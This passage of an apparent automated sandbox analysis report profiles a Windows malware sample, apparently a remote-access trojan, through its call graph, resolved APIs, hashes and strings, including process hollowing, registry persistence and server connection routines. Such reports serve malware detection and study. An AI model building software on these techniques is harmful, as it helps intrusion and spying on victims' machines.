403b40 46764->47118 46768 41a7fd 46769 4028cf 28 API calls 46768->46769 46770 41a807 46769->46770 46771 401e13 26 API calls 46770->46771 46772 41a810 46771->46772 46773 401e13 26 API calls 46772->46773 46774 40dfc3 46773->46774 46774->46501 46776 41248f RegQueryValueExA RegCloseKey 46775->46776 46777 40e08b 46775->46777 46776->46777 46777->46530 46777->46533 46779 4125b0 RegQueryValueExW RegCloseKey 46778->46779 46780 4125dd 46778->46780 46779->46780 46781 403b40 28 API calls 46780->46781 46782 40e0ba 46781->46782 46782->46542 46784 412992 RegDeleteValueW 46783->46784 46785 4129a6 46783->46785 46784->46785 46786 4129a2 46784->46786 46785->46551 46786->46551 46788 40cbc5 46787->46788 46789 41246e 3 API calls 46788->46789 46790 40cbcc 46789->46790 46791 40cbeb 46790->46791 47151 401602 46790->47151 46795 413fd4 46791->46795 46793 40cbd9 47154 4127d5 RegCreateKeyA 46793->47154 46796 413feb 46795->46796 47171 41aa73 46796->47171 46798 413ff6 46799 401d64 28 API calls 46798->46799 46800 41400f 46799->46800 46801 43a5e7 _strftime 42 API calls 46800->46801 46802 41401c 46801->46802 46803 414021 Sleep 46802->46803 46804 41402e 46802->46804 46803->46804 46805 401f66 28 API calls 46804->46805 46806 41403d 46805->46806 46807 401d64 28 API calls 46806->46807 46808 41404b 46807->46808 46809 401fbd 28 API calls 46808->46809 46810 414053 46809->46810 46811 41afc3 28 API calls 46810->46811 46812 41405b 46811->46812 47175 404262 WSAStartup 46812->47175 46814 414065 46815 401d64 28 API calls 46814->46815 46816 41406e 46815->46816 46817 401d64 28 API calls 46816->46817 46842 4140ed 46816->46842 46818 414087 46817->46818 46819 401d64 28 API calls 46818->46819 46820 414098 46819->46820 46822 401d64 28 API calls 46820->46822 46821 41afc3 28 API calls 46821->46842 46823 4140a9 46822->46823 46825 401d64 28 API calls 46823->46825 46824 4085b4 28 API calls 46824->46842 46826 4140ba 46825->46826 46829 401d64 28 API calls 46826->46829 46827 4027cb 28 API calls 46827->46842 46828 401eef 26 API calls 46828->46842 46830 4140cb 46829->46830 46831 401d64 28 API calls 46830->46831 46832 4140dd 46831->46832 47277 404101 87 API calls 46832->47277 46834 41a686 79 API calls 46834->46842 46836 414244 WSAGetLastError 47278 41bc76 30 API calls 46836->47278 46841 401f66 28 API calls 46841->46842 46842->46821 46842->46824 46842->46827 46842->46828 46842->46834 46842->46836 46842->46841 46844 401d64 28 API calls 46842->46844 46846 404cbf 28 API calls 46842->46846 46847 401d8c 26 API calls 46842->46847 46848 405ce6 28 API calls 46842->46848 46849 43a5e7 _strftime 42 API calls 46842->46849 46851 401eea 26 API calls 46842->46851 46855 401fbd 28 API calls 46842->46855 46857 412513 31 API calls 46842->46857 46874 41446f 46842->46874 47176 413f9a 46842->47176 47181 4041f1 46842->47181 47188 404915 46842->47188 47203 40428c connect 46842->47203 47263 4047eb WaitForSingleObject 46842->47263 47279 404c9e 28 API calls 46842->47279 47280 413683 50 API calls 46842->47280 47281 4082dc 28 API calls 46842->47281 47282 440c51 26 API calls 46842->47282 47283 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46842->47283 46844->46842 46846->46842 46847->46842 46848->46842 46850 414b80 Sleep 46849->46850 46850->46842 46851->46842 46855->46842 46857->46842 46858 403b40 28 API calls 46858->46874 46861 401d64 28 API calls 46862 4144ed GetTickCount 46861->46862 47286 41ad46 28 API calls 46862->47286 46865 41ad46 28 API calls 46865->46874 46867 41aec8 28 API calls 46867->46874 46870 40275c 28 API calls 46870->46874 46871 405ce6 28 API calls 46871->46874 46872 4027cb 28 API calls 46872->46874 46874->46842 46874->46858 46874->46861 46874->46865 46874->46867 46874->46870 46874->46871 46874->46872 46875 401eea 26 API calls 46874->46875 46878 401f66 28 API calls 46874->46878 46879 41a686 79 API calls 46874->46879 46880 414b22 CreateThread 46874->46880 46881 401e13 26 API calls 46874->46881 47284 40cbf1 6 API calls 46874->47284 47285 41adee 28 API calls 46874->47285 47287 41aca0 GetTickCount 46874->47287 47288 41ac52 30 API calls ___scrt_fastfail 46874->47288 47289 40e679 29 API calls 46874->47289 47290 4027ec 28 API calls 46874->47290 47291 404468 59 API calls _Yarn 46874->47291 47292 4045d5 111 API calls _Yarn 46874->47292 47293 40a767 84 API calls 46874->47293 46875->46874 46878->46874 46879->46874 46880->46874 47318 419e89 101 API calls 46880->47318 46881->46874 46882->46301 46883->46310 46886 4085c0 46885->46886 46887 402e78 28 API calls 46886->46887 46888 4085e4 46887->46888 46888->46332 46890 4124e1 RegQueryValueExA RegCloseKey 46889->46890 46891 41250b 46889->46891 46890->46891 46891->46328 46892->46335 46893->46364 46894->46358 46895->46348 46896->46362 46898 40c8ba 46897->46898 46899 40c8da 46898->46899 46900 40c90f 46898->46900 46902 40c8d0 46898->46902 47319 41a74b 29 API calls 46899->47319 46903 41b15b GetCurrentProcess 46900->46903 46901 40ca03 GetLongPathNameW 46905 403b40 28 API calls 46901->46905 46902->46901 46906 40c914 46903->46906 46908 40ca18 46905->46908 46909 40c918 46906->46909 46910 40c96a 46906->46910 46907 40c8e3 46911 401e18 26 API calls 46907->46911 46913 403b40 28 API calls 46908->46913 46915 403b40 28 API calls 46909->46915 46914 403b40 28 API calls 46910->46914 46912 40c8ed 46911->46912 46919 401e13 26 API calls 46912->46919 46916 40ca27 46913->46916 46917 40c978 46914->46917 46918 40c926 46915->46918 47322 40cc37 28 API calls 46916->47322 46923 403b40 28 API calls 46917->46923 46924 403b40 28 API calls 46918->46924 46919->46902 46921 40ca3a 47323 402860 28 API calls 46921->47323 46926 40c98e 46923->46926 46927 40c93c 46924->46927 46925 40ca45 47324 402860 28 API calls 46925->47324 47321 402860 28 API calls 46926->47321 47320 402860 28 API calls 46927->47320 46931 40c999 46934 401e18 26 API calls 46931->46934 46932 40c947 46935 401e18 26 API calls 46932->46935 46933 40ca4f 46936 401e13 26 API calls 46933->46936 46938 40c9a4 46934->46938 46939 40c952 46935->46939 46937 40ca59 46936->46937 46940 401e13 26 API calls 46937->46940 46941 401e13 26 API calls 46938->46941 46942 401e13 26 API calls 46939->46942 46943 40ca62 46940->46943 46944 40c9ad 46941->46944 46945 40c95b 46942->46945 46946 401e13 26 API calls 46943->46946 46947 401e13 26 API calls 46944->46947 46948 401e13 26 API calls 46945->46948 46949 40ca6b 46946->46949 46947->46912 46948->46912 46950 401e13 26 API calls 46949->46950 46951 40ca74 46950->46951 46952 401e13 26 API calls 46951->46952 46953 40ca7d 46952->46953 46953->46410 46954->46422 46955->46443 46956->46403 46957->46436 46958->46472 46959->46482 46960->46506 46961->46494 46962->46527 46964 401e0c 46963->46964 46965->46355 46968 40e183 46967->46968 46969 41a65c LoadResource LockResource SizeofResource 46967->46969 46968->46584 46969->46968 46971 401f8e 46970->46971 46977 402325 46971->46977 46973 401fa4 46973->46588 46975 401f86 28 API calls 46974->46975 46976 406066 46975->46976 46976->46595 46978 40232f 46977->46978 46980 40233a 46978->46980 46981 40294a 28 API calls 46978->46981 46980->46973 46981->46980 46983 40250d 46982->46983 46985 40252b 46983->46985 46986 40261a 28 API calls 46983->46986 46985->46599 46986->46985 46987->46613 46988->46613 46989->46609 46990->46620 46991->46624 46992->46628 46993->46630 46997 402e85 46995->46997 46996 402ea9 46996->46639 46997->46996 46998 402e98 46997->46998 47000 402eae 46997->47000 47002 403445 28 API calls 46998->47002 47000->46996 47003 40225b 26 API calls 47000->47003 47002->46996 47003->46996 47005 404bd0 47004->47005 47008 40245c 47005->47008 47007 404be4 47007->46642 47009 402469 47008->47009 47010 402478 47009->47010 47012 402ad3 28 API calls 47009->47012 47010->47007 47012->47010 47013->46646 47014->46648 47016 401e94 47015->47016 47018 41a471 47017->47018 47019 41b168 GetCurrentProcess 47017->47019 47020 412513 RegOpenKeyExA 47018->47020 47019->47018 47021 412541 RegQueryValueExA RegCloseKey 47020->47021 47022 412569 47020->47022 47021->47022 47023 401f66 28 API calls 47022->47023 47024 41257e 47023->47024 47024->46663 47025->46671 47027 40b02f 47026->47027 47030 40b04b 47027->47030 47029 40b045 47029->46682 47031 40b055 47030->47031 47033 40b060 47031->47033 47034 40b138 28 API calls 47031->47034 47033->47029 47034->47033 47035->46686 47036->46688 47038 40230d 47037->47038 47039 402325 28 API calls 47038->47039 47040 401f80 47039->47040 47040->46415 47059 43a545 47041->47059 47043 43998b 47068 4392de 38 API calls 2 library calls 47043->47068 47044 439950 47044->47043 47045 439965 47044->47045 47058 40dd54 47044->47058 47066 445354 20 API calls __dosmaperr 47045->47066 47048 43996a 47067 43a827 26 API calls _Deallocate 47048->47067 47051 439997 47052 4399c6 47051->47052 47069 43a58a 42 API calls __Tolower 47051->47069 47053 439a32 47052->47053 47070 43a4f1 26 API calls 2 library calls 47052->47070 47071 43a4f1 26 API calls 2 library calls 47053->47071 47056 439af9 _strftime 47056->47058 47072 445354 20 API calls __dosmaperr 47056->47072 47058->46430 47058->46432 47060 43a54a 47059->47060 47061 43a55d 47059->47061 47073 445354 20 API calls __dosmaperr 47060->47073 47061->47044 47063 43a54f 47074 43a827 26 API calls _Deallocate 47063->47074 47065 43a55a 47065->47044 47066->47048 47067->47058 47068->47051 47069->47051 47070->47053 47071->47056 47072->47058 47073->47063 47074->47065 47079 401e9b 47075->47079 47077 4027d9 47077->46727 47078->46731 47080 401ea7 47079->47080 47081 40245c 28 API calls 47080->47081 47082 401eb9 47081->47082 47082->47077 47084 409855 47083->47084 47085 4124b7 3 API calls 47084->47085 47086 40985c 47085->47086 47087 409870 47086->47087 47088 40988a 47086->47088 47089 4095cf 47087->47089 47090 409875 47087->47090 47104 4082dc 28 API calls 47088->47104 47089->46467 47102 4082dc 28 API calls 47090->47102 47093 409898 47105 4098a5 85 API calls 47093->47105 47094 409883 47103 409959 29 API calls 47094->47103 47097 409888 47097->47089 47098->46755 47109 402d8b 47099->47109 47101 4028dd 47101->46759 47102->47094 47103->47097 47106 40999f 129 API calls 47103->47106 47104->47093 47105->47089 47107 4099b5 52 API calls 47105->47107 47108 4099a9 124 API calls 47105->47108 47110 402d97 47109->47110 47113 4030f7 47110->47113 47112 402dab 47112->47101 47114 403101 47113->47114 47116 403115 47114->47116 47117 4036c2 28 API calls 47114->47117 47116->47112 47117->47116 47119 403b48 47118->47119 47125 403b7a 47119->47125 47122 403cbb 47134 403dc2 47122->47134 47124 403cc9 47124->46768 47126 403b86 47125->47126 47129 403b9e 47126->47129 47128 403b5a 47128->47122 47130 403ba8 47129->47130 47131 403bb3 47130->47131 47133 403cfd 28 API calls 47130->47133 47131->47128 47133->47131 47135 403dce 47134->47135 47138 402ffd 47135->47138 47137 403de3 47137->47124 47139 40300e 47138->47139 47144 4032a4 47139->47144 47143 40302e 47143->47137 47145 4032b0 47144->47145 47146 40301a 47144->47146 47150 4032b6 28 API calls 47145->47150 47146->47143 47149 4035e8 28 API calls 47146->47149 47149->47143 47157 4395ba 47151->47157 47155 412814 47154->47155 47156 4127ed RegSetValueExA RegCloseKey 47154->47156 47155->46791 47156->47155 47160 43953b 47157->47160 47159 401608 47159->46793 47161 43954a 47160->47161 47162 43955e 47160->47162 47168 445354 20 API calls __dosmaperr 47161->47168 47167 43955a __alldvrm 47162->47167 47170 447601 11 API calls 2 library calls 47162->47170 47164 43954f 47169 43a827 26 API calls _Deallocate 47164->47169 47167->47159 47168->47164 47169->47167 47170->47167 47174 41aab9 _Yarn ___scrt_fastfail 47171->47174 47172 401f66 28 API calls 47173 41ab2e 47172->47173 47173->46798 47174->47172 47175->46814 47177 413fb3 getaddrinfo WSASetLastError 47176->47177 47178 413fa9 47176->47178 47177->46842 47294 413e37 35 API calls ___std_exception_copy 47178->47294 47180 413fae 47180->47177 47182 404206 socket 47181->47182 47183 4041fd 47181->47183 47185 404220 47182->47185 47186 404224 CreateEventW 47182->47186 47295 404262 WSAStartup 47183->47295 47185->46842 47186->46842 47187 404202 47187->47182 47187->47185 47189 4049b1 47188->47189 47190 40492a 47188->47190 47189->46842 47191 404933 47190->47191 47192 404987 CreateEventA CreateThread 47190->47192 47193 404942 GetLocalTime 47190->47193 47191->47192 47192->47189 47298 404b1d 47192->47298 47296 41ad46 28 API calls 47193->47296 47195 40495b 47297 404c9e 28 API calls 47195->47297 47197 404968 47198 401f66 28 API calls 47197->47198 47199 404977 47198->47199 47200 41a686 79 API calls 47199->47200 47201 40497c 47200->47201 47202 401eea 26 API calls 47201->47202 47202->47192 47204 4043e1 47203->47204 47205 4042b3 47203->47205 47206 4043e7 WSAGetLastError 47204->47206 47258 404343 47204->47258 47207 4042e8 47205->47207 47209 404cbf 28 API calls 47205->47209 47205->47258 47208 4043f7 47206->47208 47206->47258 47302 420151 27 API calls 47207->47302 47210 4042f7 47208->47210 47211 4043fc 47208->47211 47214 4042d4 47209->47214 47217 401f66 28 API calls 47210->47217 47313 41bc76 30 API calls 47211->47313 47213 4042f0 47213->47210 47216 404306 47213->47216 47218 401f66 28 API calls 47214->47218 47226 404315 47216->47226 47227 40434c 47216->47227 47220 404448 47217->47220 47221 4042e3 47218->47221 47219 40440b 47314 404c9e 28 API calls 47219->47314 47223 401f66 28 API calls 47220->47223 47224 41a686 79 API calls 47221->47224 47228 404457 47223->47228 47224->47207 47225 404418 47229 401f66 28 API calls 47225->47229 47232 401f66 28 API calls 47226->47232 47310 420f34 55 API calls 47227->47310 47233 41a686 79 API calls 47228->47233 47231 404427 47229->47231 47235 41a686 79 API calls 47231->47235 47236 404324 47232->47236 47233->47258 47234 404354 47237 404389 47234->47237 47238 404359 47234->47238 47239 40442c 47235->47239 47240 401f66 28 API calls 47236->47240 47312 4202ea 28 API calls 47237->47312 47241 401f66 28 API calls 47238->47241 47242 401eea 26 API calls 47239->47242 47243 404333 47240->47243 47245 404368 47241->47245 47242->47258 47246 41a686 79 API calls 47243->47246 47248 401f66 28 API calls 47245->47248 47249 404338 47246->47249 47247 404391 47250 4043be CreateEventW CreateEventW 47247->47250 47252 401f66 28 API calls 47247->47252 47251 404377 47248->47251 47303 420191 47249->47303 47250->47258 47254 41a686 79 API calls 47251->47254 47253 4043a7 47252->47253 47256 401f66 28 API calls 47253->47256 47257 40437c 47254->47257 47259 4043b6 47256->47259 47311 420592 53 API calls 47257->47311 47258->46842 47261 41a686 79 API calls 47259->47261 47262 4043bb 47261->47262 47262->47250 47264 404805 SetEvent CloseHandle 47263->47264 47265 40481c closesocket 47263->47265 47266 40489c 47264->47266 47267 404829 47265->47267 47266->46842 47268 404838 47267->47268 47269 40483f 47267->47269 47317 404ab1 83 API calls 47268->47317 47271 404851 WaitForSingleObject 47269->47271 47272 404892 SetEvent CloseHandle 47269->47272 47273 420191 3 API calls 47271->47273 47272->47266 47274 404860 SetEvent WaitForSingleObject 47273->47274 47275 420191 3 API calls 47274->47275 47276 404878 SetEvent CloseHandle CloseHandle 47275->47276 47276->47272 47277->46842 47278->46842 47279->46842 47280->46842 47281->46842 47282->46842 47283->46842 47284->46874 47285->46874 47286->46874 47287->46874 47288->46874 47289->46874 47290->46874 47291->46874 47292->46874 47293->46874 47294->47180 47295->47187 47296->47195 47297->47197 47301 404b29 101 API calls 47298->47301 47300 404b26 47301->47300 47302->47213 47304 41dc15 47303->47304 47305 420199 47303->47305 47306 41dc23 47304->47306 47315 41cd69 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47304->47315 47305->47258 47316 41d950 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47306->47316 47309 41dc2a 47310->47234 47311->47249 47312->47247 47313->47219 47314->47225 47315->47306 47316->47309 47317->47269 47319->46907 47320->46932 47321->46931 47322->46921 47323->46925 47324->46933 47327 40e56a 47325->47327 47326 4124b7 3 API calls 47326->47327 47327->47326 47329 40e60e 47327->47329 47331 40e5fe Sleep 47327->47331 47347 40e59c 47327->47347 47361 4082dc 28 API calls 47329->47361 47331->47327 47332 41ae08 28 API calls 47332->47347 47333 40e619 47335 41ae08 28 API calls 47333->47335 47336 40e625 47335->47336 47362 412774 29 API calls 47336->47362 47339 401e13 26 API calls 47339->47347 47340 40e638 47341 401e13 26 API calls 47340->47341 47343 40e644 47341->47343 47342 401f66 28 API calls 47342->47347 47344 401f66 28 API calls 47343->47344 47345 40e655 47344->47345 47348 4126d2 29 API calls 47345->47348 47346 4126d2 29 API calls 47346->47347 47347->47331 47347->47332 47347->47339 47347->47342 47347->47346 47358 40bf04 73 API calls ___scrt_fastfail 47347->47358 47359 4082dc 28 API calls 47347->47359 47360 412774 29 API calls 47347->47360 47349 40e668 47348->47349 47363 411699 TerminateProcess WaitForSingleObject 47349->47363 47351 40e670 ExitProcess 47364 411637 60 API calls 47352->47364 47359->47347 47360->47347 47361->47333 47362->47340 47363->47351

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                            • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                            • API String ID: 384173800-625181639
                                                                                                            • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                            • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                            • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                            • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                                            • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                                                                                                            • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                            • API String ID: 2281282204-3981147832
                                                                                                            • Opcode ID: d0b700c6543029a90e3e86d7f1c8fe1d49ffd33392616e1de0625f56461d18dd
                                                                                                            • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                            • Opcode Fuzzy Hash: d0b700c6543029a90e3e86d7f1c8fe1d49ffd33392616e1de0625f56461d18dd
                                                                                                            • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1179 404915-404924 1180 4049b1 1179->1180 1181 40492a-404931 1179->1181 1184 4049b3-4049b7 1180->1184 1182 404933-404937 1181->1182 1183 404939-404940 1181->1183 1185 404987-4049af CreateEventA CreateThread 1182->1185 1183->1185 1186 404942-404982 GetLocalTime call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1183->1186 1185->1184 1186->1185
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                                                                                                            Strings
                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$EventLocalThreadTime
                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                            • API String ID: 2532271599-1507639952
                                                                                                            • Opcode ID: 99c7677557354231c88b4d57898418f8e8d9318d7f2a86bda15906334fb82310
                                                                                                            • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                            • Opcode Fuzzy Hash: 99c7677557354231c88b4d57898418f8e8d9318d7f2a86bda15906334fb82310
                                                                                                            • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                            APIs
                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 1815803762-0
                                                                                                            • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                            • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                            • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                            • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                            APIs
                                                                                                            • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Name$ComputerUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 4229901323-0
                                                                                                            • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                                                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                            • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                                                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 103 40d9d5-40d9d9 93->103 104 40d9ce-40d9d0 93->104 94->93 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 